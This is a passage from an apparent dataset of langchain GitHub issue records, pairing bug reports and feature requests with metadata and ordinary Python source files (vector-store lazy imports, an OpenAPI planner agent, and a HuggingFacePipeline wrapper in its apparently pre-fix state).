import AwaDB return AwaDB def _import_azuresearch() -> Any: from langchain.vectorstores.azuresearch import AzureSearch return AzureSearch def _import_bageldb() -> Any: from langchain.vectorstores.bageldb import Bagel return Bagel def _import_cassandra() -> Any: from langchain.vectorstores.cassandra import Cassandra return Cassandra def _import_chroma() -> Any: from langchain.vectorstores.chroma import Chroma return Chroma def _import_clarifai() -> Any: from langchain.vectorstores.clarifai import Clarifai return Clarifai def _import_clickhouse() -> Any: from langchain.vectorstores.clickhouse import Clickhouse return Clickhouse def _import_clickhouse_settings() -> Any: from langchain.vectorstores.clickhouse import ClickhouseSettings return ClickhouseSettings def _import_dashvector() -> Any: from langchain.vectorstores.dashvector import DashVector return DashVector def _import_deeplake() -> Any: from langchain.vectorstores.deeplake import DeepLake return DeepLake def _import_dingo() -> Any: from langchain.vectorstores.dingo import Dingo return Dingo def _import_docarray_hnsw() -> Any: from langchain.vectorstores.docarray import DocArrayHnswSearch return DocArrayHnswSearch def _import_docarray_inmemory() -> Any: from langchain.vectorstores.docarray import DocArrayInMemorySearch return DocArrayInMemorySearch def _import_elasticsearch() -> Any: from langchain.vectorstores.elasticsearch import ElasticsearchStore return ElasticsearchStore def _import_epsilla() -> Any: from langchain.vectorstores.epsilla import Epsilla return Epsilla def _import_faiss() -> Any: from langchain.vectorstores.faiss import FAISS return FAISS def _import_hologres() -> Any: from langchain.vectorstores.hologres import Hologres return Hologres def _import_lancedb() -> Any: from langchain.vectorstores.lancedb import LanceDB return LanceDB def _import_llm_rails() -> Any: from langchain.vectorstores.llm_rails import LLMRails return LLMRails def 
_import_marqo() -> Any: from langchain.vectorstores.marqo import Marqo return Marqo def _import_matching_engine() -> Any: from langchain.vectorstores.matching_engine import MatchingEngine return MatchingEngine def _import_meilisearch() -> Any: from langchain.vectorstores.meilisearch import Meilisearch return Meilisearch def _import_milvus() -> Any: from langchain.vectorstores.milvus import Milvus return Milvus def _import_momento_vector_index() -> Any: from langchain.vectorstores.momento_vector_index import MomentoVectorIndex return MomentoVectorIndex def _import_mongodb_atlas() -> Any: from langchain.vectorstores.mongodb_atlas import MongoDBAtlasVectorSearch return MongoDBAtlasVectorSearch def _import_myscale() -> Any: from langchain.vectorstores.myscale import MyScale return MyScale def _import_myscale_settings() -> Any: from langchain.vectorstores.myscale import MyScaleSettings return MyScaleSettings def _import_neo4j_vector() -> Any: from langchain.vectorstores.neo4j_vector import Neo4jVector return Neo4jVector def _import_opensearch_vector_search() -> Any: from langchain.vectorstores.opensearch_vector_search import OpenSearchVectorSearch return OpenSearchVectorSearch def _import_pgembedding() -> Any: from langchain.vectorstores.pgembedding import PGEmbedding return PGEmbedding def _import_pgvector() -> Any: from langchain.vectorstores.pgvector import PGVector return PGVector def _import_pinecone() -> Any: from langchain.vectorstores.pinecone import Pinecone return Pinecone def _import_qdrant() -> Any: from langchain.vectorstores.qdrant import Qdrant return Qdrant def _import_redis() -> Any: from langchain.vectorstores.redis import Redis return Redis def _import_rocksetdb() -> Any: from langchain.vectorstores.rocksetdb import Rockset return Rockset def _import_vespa() -> Any: from langchain.vectorstores.vespa import VespaStore return VespaStore def _import_scann() -> Any: from langchain.vectorstores.scann import ScaNN return ScaNN def _import_singlestoredb() -> Any: from langchain.vectorstores.singlestoredb import SingleStoreDB return SingleStoreDB def _import_sklearn() -> Any: from langchain.vectorstores.sklearn import SKLearnVectorStore return SKLearnVectorStore def _import_sqlitevss() -> Any: from langchain.vectorstores.sqlitevss import SQLiteVSS return SQLiteVSS def _import_starrocks() -> Any: from langchain.vectorstores.starrocks import StarRocks return StarRocks def _import_supabase() -> Any: from langchain.vectorstores.supabase import SupabaseVectorStore return SupabaseVectorStore def _import_tair() -> Any: from langchain.vectorstores.tair import Tair return Tair def _import_tencentvectordb() -> Any: from langchain.vectorstores.tencentvectordb import TencentVectorDB return TencentVectorDB def _import_tigris() -> Any: from langchain.vectorstores.tigris import Tigris return Tigris def _import_timescalevector() -> Any: from langchain.vectorstores.timescalevector import TimescaleVector return TimescaleVector def _import_typesense() -> Any: from langchain.vectorstores.typesense import Typesense return Typesense def _import_usearch() -> Any: from langchain.vectorstores.usearch import USearch return USearch def _import_vald() -> Any: from langchain.vectorstores.vald import Vald return Vald def _import_vearch() -> Any: from langchain.vectorstores.vearch import Vearch return Vearch def _import_vectara() -> Any: from langchain.vectorstores.vectara import Vectara return Vectara def _import_weaviate() -> Any: from langchain.vectorstores.weaviate import Weaviate return Weaviate def 
_import_zep() -> Any: from langchain.vectorstores.zep import ZepVectorStore return ZepVectorStore def _import_zilliz() -> Any: from langchain.vectorstores.zilliz import Zilliz return Zilliz def __getattr__(name: str) -> Any: if name == "AnalyticDB": return _import_analyticdb() elif name == "AlibabaCloudOpenSearch": return _import_alibaba_cloud_open_search() elif name == "AlibabaCloudOpenSearchSettings": return _import_alibaba_cloud_open_search_settings() elif name == "ElasticKnnSearch": return _import_elastic_knn_search() elif name == "ElasticVectorSearch": return _import_elastic_vector_search() elif name == "Annoy": return _import_annoy() elif name == "AtlasDB": return _import_atlas() elif name == "AwaDB": return _import_awadb() elif name == "AzureSearch": return _import_azuresearch() elif name == "Bagel": return _import_bageldb() elif name == "Cassandra": return _import_cassandra() elif name == "Chroma": return _import_chroma() elif name == "Clarifai": return _import_clarifai() elif name == "ClickhouseSettings": return _import_clickhouse_settings() elif name == "Clickhouse": return _import_clickhouse() elif name == "DashVector": return _import_dashvector() elif name == "DeepLake": return _import_deeplake() elif name == "Dingo": return _import_dingo() elif name == "DocArrayInMemorySearch": return _import_docarray_inmemory() elif name == "DocArrayHnswSearch": return _import_docarray_hnsw() elif name == "ElasticsearchStore": return _import_elasticsearch() elif name == "Epsilla": return _import_epsilla() elif name == "FAISS": return _import_faiss() elif name == "Hologres": return _import_hologres() elif name == "LanceDB": return _import_lancedb() elif name == "LLMRails": return _import_llm_rails() elif name == "Marqo": return _import_marqo() elif name == "MatchingEngine": return _import_matching_engine() elif name == "Meilisearch": return _import_meilisearch() elif name == "Milvus": return _import_milvus() elif name == "MomentoVectorIndex": return _import_momento_vector_index() elif name == "MongoDBAtlasVectorSearch": return _import_mongodb_atlas() elif name == "MyScaleSettings": return _import_myscale_settings() elif name == "MyScale": return _import_myscale() elif name == "Neo4jVector": return _import_neo4j_vector() elif name == "OpenSearchVectorSearch": return _import_opensearch_vector_search() elif name == "PGEmbedding": return _import_pgembedding() elif name == "PGVector": return _import_pgvector() elif name == "Pinecone": return _import_pinecone() elif name == "Qdrant": return _import_qdrant() elif name == "Redis": return _import_redis() elif name == "Rockset": return _import_rocksetdb() elif name == "ScaNN": return _import_scann() elif name == "SingleStoreDB": return _import_singlestoredb() elif name == "SKLearnVectorStore": return _import_sklearn() elif name == "SQLiteVSS": return _import_sqlitevss() elif name == "StarRocks": return _import_starrocks() elif name == "SupabaseVectorStore": return _import_supabase() elif name == "Tair": return _import_tair() elif name == "TencentVectorDB": return _import_tencentvectordb() elif name == "Tigris": return _import_tigris() elif name == "TimescaleVector": return _import_timescalevector() elif name == "Typesense": return _import_typesense() elif name == "USearch": return _import_usearch() elif name == "Vald": return _import_vald() elif name == "Vearch": return _import_vearch() elif name == "Vectara": return _import_vectara() elif name == "Weaviate": return _import_weaviate() elif name == "ZepVectorStore": return _import_zep() elif name == 
"Zilliz": return _import_zilliz() elif name == "VespaStore": return _import_vespa() else: raise AttributeError(f"Could not find: {name}") __all__ = [ "AlibabaCloudOpenSearch", "AlibabaCloudOpenSearchSettings", "AnalyticDB", "Annoy", "Annoy", "AtlasDB", "AtlasDB", "AwaDB", "AzureSearch", "Bagel", "Cassandra", "Chroma", "Chroma", "Clarifai", "Clickhouse", "ClickhouseSettings", "DashVector", "DeepLake", "DeepLake", "Dingo", "DocArrayHnswSearch", "DocArrayInMemorySearch", "ElasticKnnSearch", "ElasticVectorSearch", "ElasticsearchStore", "Epsilla", "FAISS", "Hologres", "LanceDB", "LLMRails", "Marqo", "MatchingEngine", "Meilisearch", "Milvus", "MomentoVectorIndex", "MongoDBAtlasVectorSearch", "MyScale", "MyScaleSettings", "Neo4jVector", "OpenSearchVectorSearch", "OpenSearchVectorSearch", "PGEmbedding", "PGVector", "Pinecone", "Qdrant", "Redis", "Rockset", "SKLearnVectorStore", "ScaNN", "SingleStoreDB", "SingleStoreDB", "SQLiteVSS", "StarRocks", "SupabaseVectorStore", "Tair", "Tigris", "TimescaleVector", "Typesense", "USearch", "Vald", "Vearch", "Vectara", "VectorStore", "VespaStore", "Weaviate", "ZepVectorStore", "Zilliz", "Zilliz", "TencentVectorDB", ]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,627
Add AzureCosmosDBVectorSearch VectorStore
### Feature request

Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR adds support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.

[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)

### Motivation

The capability described in this feature request is currently not available for LangChain Python.

### Your contribution

I will be submitting a PR for this feature request.
https://github.com/langchain-ai/langchain/issues/11627
https://github.com/langchain-ai/langchain/pull/11632
28ee6a7c125f1eb209b6b6428d1a50040408ea9f
d0603c86b6dc559799c64033d330075a8744435e
"2023-10-10T20:55:53Z"
python
"2023-10-11T20:56:46Z"
libs/langchain/langchain/vectorstores/azure_cosmos_db.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,627
Add AzureCosmosDBVectorSearch VectorStore
### Feature request

Azure Cosmos DB for MongoDB vCore enables users to efficiently store, index, and query high-dimensional vector data directly in Azure Cosmos DB for MongoDB vCore. It supports similarity measures such as COS (cosine distance), L2 (Euclidean distance), and IP (inner product), which measure the distance between the data vectors and your query vector. The data vectors closest to your query vector are the most semantically similar and are retrieved at query time. The accompanying PR adds support for LangChain Python users to store vectors from document embeddings generated by APIs such as Azure OpenAI Embeddings or Hugging Face on Azure.

[Azure Cosmos DB for MongoDB vCore](https://learn.microsoft.com/en-us/azure/cosmos-db/mongodb/vcore/vector-search)

### Motivation

The capability described in this feature request is currently not available for LangChain Python.

### Your contribution

I will be submitting a PR for this feature request.
https://github.com/langchain-ai/langchain/issues/11627
https://github.com/langchain-ai/langchain/pull/11632
28ee6a7c125f1eb209b6b6428d1a50040408ea9f
d0603c86b6dc559799c64033d330075a8744435e
"2023-10-10T20:55:53Z"
python
"2023-10-11T20:56:46Z"
libs/langchain/tests/integration_tests/vectorstores/test_azure_cosmos_db.py
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
2,938
Allow OpenAPI planner to respect URLs with placeholders
In OpenAPI documentation, an endpoint might include a placeholder for a parameter:

```
GET /states/{abbr}
```

Currently, the OpenAPI planner requires an exact match against the documented endpoint name to retrieve documentation. With the example above, a plan step calling `GET /states/FL` would instead raise `ValueError(f"{endpoint_name} endpoint does not exist.")`.
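One possible approach (not necessarily the one the linked PR takes) is to translate each documented route into a regex, replacing every `{placeholder}` with a one-segment wildcard before matching:

```python
import re


def endpoint_matches(documented: str, requested: str) -> bool:
    """Return True if a concrete call such as 'GET /states/FL' matches a
    documented endpoint such as 'GET /states/{abbr}'."""
    # Split on {placeholder} spans (the capture group keeps them in the list),
    # escape the literal parts, and turn each placeholder into a wildcard.
    parts = re.split(r"(\{[^}]*\})", documented)
    pattern = "".join(
        "[^/]+" if part.startswith("{") else re.escape(part) for part in parts
    )
    return re.fullmatch(pattern, requested) is not None


assert endpoint_matches("GET /states/{abbr}", "GET /states/FL")
assert not endpoint_matches("GET /states/{abbr}", "GET /cities/FL")
```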
https://github.com/langchain-ai/langchain/issues/2938
https://github.com/langchain-ai/langchain/pull/2940
e42a576cb2973e36f310e1db45d75b8fa5ba9cf6
48cf9783913077fdad7c26752c7a70b20b57fb30
"2023-04-15T13:54:15Z"
python
"2023-10-12T23:20:32Z"
libs/langchain/langchain/agents/agent_toolkits/openapi/planner.py
"""Agent that interacts with OpenAPI APIs via a hierarchical planning approach.""" import json import re from functools import partial from typing import Any, Callable, Dict, List, Optional import yaml from langchain.agents.agent import AgentExecutor from langchain.agents.agent_toolkits.openapi.planner_prompt import ( API_CONTROLLER_PROMPT, API_CONTROLLER_TOOL_DESCRIPTION, API_CONTROLLER_TOOL_NAME, API_ORCHESTRATOR_PROMPT, API_PLANNER_PROMPT, API_PLANNER_TOOL_DESCRIPTION, API_PLANNER_TOOL_NAME, PARSING_DELETE_PROMPT, PARSING_GET_PROMPT, PARSING_PATCH_PROMPT, PARSING_POST_PROMPT, PARSING_PUT_PROMPT, REQUESTS_DELETE_TOOL_DESCRIPTION, REQUESTS_GET_TOOL_DESCRIPTION, REQUESTS_PATCH_TOOL_DESCRIPTION, REQUESTS_POST_TOOL_DESCRIPTION, REQUESTS_PUT_TOOL_DESCRIPTION, ) from langchain.agents.agent_toolkits.openapi.spec import ReducedOpenAPISpec from langchain.agents.mrkl.base import ZeroShotAgent from langchain.agents.tools import Tool from langchain.callbacks.base import BaseCallbackManager from langchain.chains.llm import LLMChain from langchain.llms.openai import OpenAI from langchain.memory import ReadOnlySharedMemory from langchain.prompts import PromptTemplate from langchain.pydantic_v1 import Field from langchain.schema import BasePromptTemplate from langchain.schema.language_model import BaseLanguageModel from langchain.tools.base import BaseTool from langchain.tools.requests.tool import BaseRequestsTool from langchain.utilities.requests import RequestsWrapper # # Requests tools with LLM-instructed extraction of truncated responses. # # Of course, truncating so bluntly may lose a lot of valuable # information in the response. # However, the goal for now is to have only a single inference step. MAX_RESPONSE_LENGTH = 5000 """Maximum length of the response to be returned.""" def _get_default_llm_chain(prompt: BasePromptTemplate) -> LLMChain: return LLMChain( llm=OpenAI(), prompt=prompt, ) def _get_default_llm_chain_factory( prompt: BasePromptTemplate, ) -> Callable[[], LLMChain]: """Returns a default LLMChain factory.""" return partial(_get_default_llm_chain, prompt) class RequestsGetToolWithParsing(BaseRequestsTool, BaseTool): """Requests GET tool with LLM-instructed extraction of truncated responses.""" name: str = "requests_get" """Tool name.""" description = REQUESTS_GET_TOOL_DESCRIPTION """Tool description.""" response_length: Optional[int] = MAX_RESPONSE_LENGTH """Maximum length of the response to be returned.""" llm_chain: LLMChain = Field( default_factory=_get_default_llm_chain_factory(PARSING_GET_PROMPT) ) """LLMChain used to extract the response.""" def _run(self, text: str) -> str: try: data = json.loads(text) except json.JSONDecodeError as e: raise e data_params = data.get("params") response = self.requests_wrapper.get(data["url"], params=data_params) response = response[: self.response_length] return self.llm_chain.predict( response=response, instructions=data["output_instructions"] ).strip() async def _arun(self, text: str) -> str: raise NotImplementedError() class RequestsPostToolWithParsing(BaseRequestsTool, BaseTool): """Requests POST tool with LLM-instructed extraction of truncated responses.""" name: str = "requests_post" """Tool name.""" description = REQUESTS_POST_TOOL_DESCRIPTION """Tool description.""" response_length: Optional[int] = MAX_RESPONSE_LENGTH """Maximum length of the response to be returned.""" llm_chain: LLMChain = Field( default_factory=_get_default_llm_chain_factory(PARSING_POST_PROMPT) ) """LLMChain used to extract the response.""" def _run(self, text: str) 
-> str: try: data = json.loads(text) except json.JSONDecodeError as e: raise e response = self.requests_wrapper.post(data["url"], data["data"]) response = response[: self.response_length] return self.llm_chain.predict( response=response, instructions=data["output_instructions"] ).strip() async def _arun(self, text: str) -> str: raise NotImplementedError() class RequestsPatchToolWithParsing(BaseRequestsTool, BaseTool): """Requests PATCH tool with LLM-instructed extraction of truncated responses.""" name: str = "requests_patch" """Tool name.""" description = REQUESTS_PATCH_TOOL_DESCRIPTION """Tool description.""" response_length: Optional[int] = MAX_RESPONSE_LENGTH """Maximum length of the response to be returned.""" llm_chain: LLMChain = Field( default_factory=_get_default_llm_chain_factory(PARSING_PATCH_PROMPT) ) """LLMChain used to extract the response.""" def _run(self, text: str) -> str: try: data = json.loads(text) except json.JSONDecodeError as e: raise e response = self.requests_wrapper.patch(data["url"], data["data"]) response = response[: self.response_length] return self.llm_chain.predict( response=response, instructions=data["output_instructions"] ).strip() async def _arun(self, text: str) -> str: raise NotImplementedError() class RequestsPutToolWithParsing(BaseRequestsTool, BaseTool): """Requests PUT tool with LLM-instructed extraction of truncated responses.""" name: str = "requests_put" """Tool name.""" description = REQUESTS_PUT_TOOL_DESCRIPTION """Tool description.""" response_length: Optional[int] = MAX_RESPONSE_LENGTH """Maximum length of the response to be returned.""" llm_chain: LLMChain = Field( default_factory=_get_default_llm_chain_factory(PARSING_PUT_PROMPT) ) """LLMChain used to extract the response.""" def _run(self, text: str) -> str: try: data = json.loads(text) except json.JSONDecodeError as e: raise e response = self.requests_wrapper.put(data["url"], data["data"]) response = response[: self.response_length] return self.llm_chain.predict( response=response, instructions=data["output_instructions"] ).strip() async def _arun(self, text: str) -> str: raise NotImplementedError() class RequestsDeleteToolWithParsing(BaseRequestsTool, BaseTool): """A tool that sends a DELETE request and parses the response.""" name: str = "requests_delete" """The name of the tool.""" description = REQUESTS_DELETE_TOOL_DESCRIPTION """The description of the tool.""" response_length: Optional[int] = MAX_RESPONSE_LENGTH """The maximum length of the response.""" llm_chain: LLMChain = Field( default_factory=_get_default_llm_chain_factory(PARSING_DELETE_PROMPT) ) """The LLM chain used to parse the response.""" def _run(self, text: str) -> str: try: data = json.loads(text) except json.JSONDecodeError as e: raise e response = self.requests_wrapper.delete(data["url"]) response = response[: self.response_length] return self.llm_chain.predict( response=response, instructions=data["output_instructions"] ).strip() async def _arun(self, text: str) -> str: raise NotImplementedError() # # Orchestrator, planner, controller. 
# def _create_api_planner_tool( api_spec: ReducedOpenAPISpec, llm: BaseLanguageModel ) -> Tool: endpoint_descriptions = [ f"{name} {description}" for name, description, _ in api_spec.endpoints ] prompt = PromptTemplate( template=API_PLANNER_PROMPT, input_variables=["query"], partial_variables={"endpoints": "- " + "- ".join(endpoint_descriptions)}, ) chain = LLMChain(llm=llm, prompt=prompt) tool = Tool( name=API_PLANNER_TOOL_NAME, description=API_PLANNER_TOOL_DESCRIPTION, func=chain.run, ) return tool def _create_api_controller_agent( api_url: str, api_docs: str, requests_wrapper: RequestsWrapper, llm: BaseLanguageModel, ) -> AgentExecutor: get_llm_chain = LLMChain(llm=llm, prompt=PARSING_GET_PROMPT) post_llm_chain = LLMChain(llm=llm, prompt=PARSING_POST_PROMPT) tools: List[BaseTool] = [ RequestsGetToolWithParsing( requests_wrapper=requests_wrapper, llm_chain=get_llm_chain ), RequestsPostToolWithParsing( requests_wrapper=requests_wrapper, llm_chain=post_llm_chain ), ] prompt = PromptTemplate( template=API_CONTROLLER_PROMPT, input_variables=["input", "agent_scratchpad"], partial_variables={ "api_url": api_url, "api_docs": api_docs, "tool_names": ", ".join([tool.name for tool in tools]), "tool_descriptions": "\n".join( [f"{tool.name}: {tool.description}" for tool in tools] ), }, ) agent = ZeroShotAgent( llm_chain=LLMChain(llm=llm, prompt=prompt), allowed_tools=[tool.name for tool in tools], ) return AgentExecutor.from_agent_and_tools(agent=agent, tools=tools, verbose=True) def _create_api_controller_tool( api_spec: ReducedOpenAPISpec, requests_wrapper: RequestsWrapper, llm: BaseLanguageModel, ) -> Tool: """Expose controller as a tool. The tool is invoked with a plan from the planner, and dynamically creates a controller agent with relevant documentation only to constrain the context. """ base_url = api_spec.servers[0]["url"] # TODO: do better. def _create_and_run_api_controller_agent(plan_str: str) -> str: pattern = r"\b(GET|POST|PATCH|DELETE)\s+(/\S+)*" matches = re.findall(pattern, plan_str) endpoint_names = [ "{method} {route}".format(method=method, route=route.split("?")[0]) for method, route in matches ] endpoint_docs_by_name = {name: docs for name, _, docs in api_spec.endpoints} docs_str = "" for endpoint_name in endpoint_names: docs = endpoint_docs_by_name.get(endpoint_name) if not docs: raise ValueError(f"{endpoint_name} endpoint does not exist.") docs_str += f"== Docs for {endpoint_name} == \n{yaml.dump(docs)}\n" agent = _create_api_controller_agent(base_url, docs_str, requests_wrapper, llm) return agent.run(plan_str) return Tool( name=API_CONTROLLER_TOOL_NAME, func=_create_and_run_api_controller_agent, description=API_CONTROLLER_TOOL_DESCRIPTION, ) def create_openapi_agent( api_spec: ReducedOpenAPISpec, requests_wrapper: RequestsWrapper, llm: BaseLanguageModel, shared_memory: Optional[ReadOnlySharedMemory] = None, callback_manager: Optional[BaseCallbackManager] = None, verbose: bool = True, agent_executor_kwargs: Optional[Dict[str, Any]] = None, **kwargs: Dict[str, Any], ) -> AgentExecutor: """Instantiate OpenAI API planner and controller for a given spec. Inject credentials via requests_wrapper. We use a top-level "orchestrator" agent to invoke the planner and controller, rather than a top-level planner that invokes a controller with its plan. This is to keep the planner simple. 
""" tools = [ _create_api_planner_tool(api_spec, llm), _create_api_controller_tool(api_spec, requests_wrapper, llm), ] prompt = PromptTemplate( template=API_ORCHESTRATOR_PROMPT, input_variables=["input", "agent_scratchpad"], partial_variables={ "tool_names": ", ".join([tool.name for tool in tools]), "tool_descriptions": "\n".join( [f"{tool.name}: {tool.description}" for tool in tools] ), }, ) agent = ZeroShotAgent( llm_chain=LLMChain(llm=llm, prompt=prompt, memory=shared_memory), allowed_tools=[tool.name for tool in tools], **kwargs, ) return AgentExecutor.from_agent_and_tools( agent=agent, tools=tools, callback_manager=callback_manager, verbose=verbose, **(agent_executor_kwargs or {}), )
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,809
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### System Info LangChain: langchain-0.0.314 Python: Anaconda Python 3.9.18 X86 RTX3080 Laptop (16G) CUDA 11.8 cuDNN 8.9.5 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1.git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git 2.cd Chinese-LLaMA-Alpaca-2/scripts/langchain 3.python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine (langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine /home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported. warnings.warn( loading LLM... Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it] /home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed. warnings.warn( /home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed. warnings.warn( Traceback (most recent call last): File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module> model = HuggingFacePipeline.from_model_id(model_id=model_path, File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id model.is_quantized File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__ raise AttributeError("'{}' object has no attribute '{}'".format( AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' ### Expected behavior ![image](https://github.com/langchain-ai/langchain/assets/63148804/b7dc429d-e19b-45fc-ba70-b977b72af9b8)
https://github.com/langchain-ai/langchain/issues/11809
https://github.com/langchain-ai/langchain/pull/11891
efa9ef75c098e23f00f95be73c39ae66fdb1c082
5019f59724b2b6adf840b78019f2581546cb390d
"2023-10-14T13:46:33Z"
python
"2023-10-16T23:54:20Z"
libs/langchain/langchain/llms/huggingface_pipeline.py
from __future__ import annotations import importlib.util import logging from typing import Any, List, Mapping, Optional from langchain.callbacks.manager import CallbackManagerForLLMRun from langchain.llms.base import BaseLLM from langchain.llms.utils import enforce_stop_tokens from langchain.pydantic_v1 import Extra from langchain.schema import Generation, LLMResult DEFAULT_MODEL_ID = "gpt2" DEFAULT_TASK = "text-generation" VALID_TASKS = ("text2text-generation", "text-generation", "summarization") DEFAULT_BATCH_SIZE = 4 logger = logging.getLogger(__name__) class HuggingFacePipeline(BaseLLM): """HuggingFace Pipeline API. To use, you should have the ``transformers`` python package installed. Only supports `text-generation`, `text2text-generation` and `summarization` for now. Example using from_model_id: .. code-block:: python from langchain.llms import HuggingFacePipeline hf = HuggingFacePipeline.from_model_id( model_id="gpt2", task="text-generation", pipeline_kwargs={"max_new_tokens": 10}, ) Example passing pipeline in directly: .. code-block:: python from langchain.llms import HuggingFacePipeline from transformers import AutoModelForCausalLM, AutoTokenizer, pipeline model_id = "gpt2" tokenizer = AutoTokenizer.from_pretrained(model_id) model = AutoModelForCausalLM.from_pretrained(model_id) pipe = pipeline( "text-generation", model=model, tokenizer=tokenizer, max_new_tokens=10 ) hf = HuggingFacePipeline(pipeline=pipe) """ pipeline: Any #: :meta private: model_id: str = DEFAULT_MODEL_ID """Model name to use.""" model_kwargs: Optional[dict] = None """Keyword arguments passed to the model.""" pipeline_kwargs: Optional[dict] = None """Keyword arguments passed to the pipeline.""" batch_size: int = DEFAULT_BATCH_SIZE """Batch size to use when passing multiple documents to generate.""" class Config: """Configuration for this pydantic object.""" extra = Extra.forbid @classmethod def from_model_id( cls, model_id: str, task: str, device: Optional[int] = -1, model_kwargs: Optional[dict] = None, pipeline_kwargs: Optional[dict] = None, batch_size: int = DEFAULT_BATCH_SIZE, **kwargs: Any, ) -> HuggingFacePipeline: """Construct the pipeline object from model_id and task.""" try: from transformers import ( AutoModelForCausalLM, AutoModelForSeq2SeqLM, AutoTokenizer, ) from transformers import pipeline as hf_pipeline except ImportError: raise ValueError( "Could not import transformers python package. " "Please install it with `pip install transformers`." ) _model_kwargs = model_kwargs or {} tokenizer = AutoTokenizer.from_pretrained(model_id, **_model_kwargs) try: if task == "text-generation": model = AutoModelForCausalLM.from_pretrained(model_id, **_model_kwargs) elif task in ("text2text-generation", "summarization"): model = AutoModelForSeq2SeqLM.from_pretrained(model_id, **_model_kwargs) else: raise ValueError( f"Got invalid task {task}, " f"currently only {VALID_TASKS} are supported" ) except ImportError as e: raise ValueError( f"Could not load the {task} model due to missing dependencies." ) from e if ( model.is_quantized or model.model.is_loaded_in_4bit or model.model.is_loaded_in_8bit ) and device is not None: logger.warning( f"Setting the `device` argument to None from {device} to avoid " "the error caused by attempting to move the model that was already " "loaded on the GPU using the Accelerate module to the same or " "another device." 
) device = None if device is not None and importlib.util.find_spec("torch") is not None: import torch cuda_device_count = torch.cuda.device_count() if device < -1 or (device >= cuda_device_count): raise ValueError( f"Got device=={device}, " f"device is required to be within [-1, {cuda_device_count})" ) if device < 0 and cuda_device_count > 0: logger.warning( "Device has %d GPUs available. " "Provide device={deviceId} to `from_model_id` to use available " "GPUs for execution. deviceId is -1 (default) for CPU and " "can be a positive integer associated with CUDA device id.", cuda_device_count, ) if "trust_remote_code" in _model_kwargs: _model_kwargs = { k: v for k, v in _model_kwargs.items() if k != "trust_remote_code" } _pipeline_kwargs = pipeline_kwargs or {} pipeline = hf_pipeline( task=task, model=model, tokenizer=tokenizer, device=device, batch_size=batch_size, model_kwargs=_model_kwargs, **_pipeline_kwargs, ) if pipeline.task not in VALID_TASKS: raise ValueError( f"Got invalid task {pipeline.task}, " f"currently only {VALID_TASKS} are supported" ) return cls( pipeline=pipeline, model_id=model_id, model_kwargs=_model_kwargs, pipeline_kwargs=_pipeline_kwargs, batch_size=batch_size, **kwargs, ) @property def _identifying_params(self) -> Mapping[str, Any]: """Get the identifying parameters.""" return { "model_id": self.model_id, "model_kwargs": self.model_kwargs, "pipeline_kwargs": self.pipeline_kwargs, } @property def _llm_type(self) -> str: return "huggingface_pipeline" def _generate( self, prompts: List[str], stop: Optional[List[str]] = None, run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> LLMResult: # List to hold all results text_generations: List[str] = [] for i in range(0, len(prompts), self.batch_size): batch_prompts = prompts[i : i + self.batch_size] # Process batch of prompts responses = self.pipeline(batch_prompts) # Process each response in the batch for j, response in enumerate(responses): if isinstance(response, list): # if model returns multiple generations, pick the top one response = response[0] if self.pipeline.task == "text-generation": try: from transformers.pipelines.text_generation import ReturnType remove_prompt = ( self.pipeline._postprocess_params.get("return_type") != ReturnType.NEW_TEXT ) except Exception as e: logger.warning( f"Unable to extract pipeline return_type. " f"Received error:\n\n{e}" ) remove_prompt = True if remove_prompt: text = response["generated_text"][len(batch_prompts[j]) :] else: text = response["generated_text"] elif self.pipeline.task == "text2text-generation": text = response["generated_text"] elif self.pipeline.task == "summarization": text = response["summary_text"] else: raise ValueError( f"Got invalid task {self.pipeline.task}, " f"currently only {VALID_TASKS} are supported" ) if stop: # Enforce stop tokens text = enforce_stop_tokens(text, stop) # Append the processed 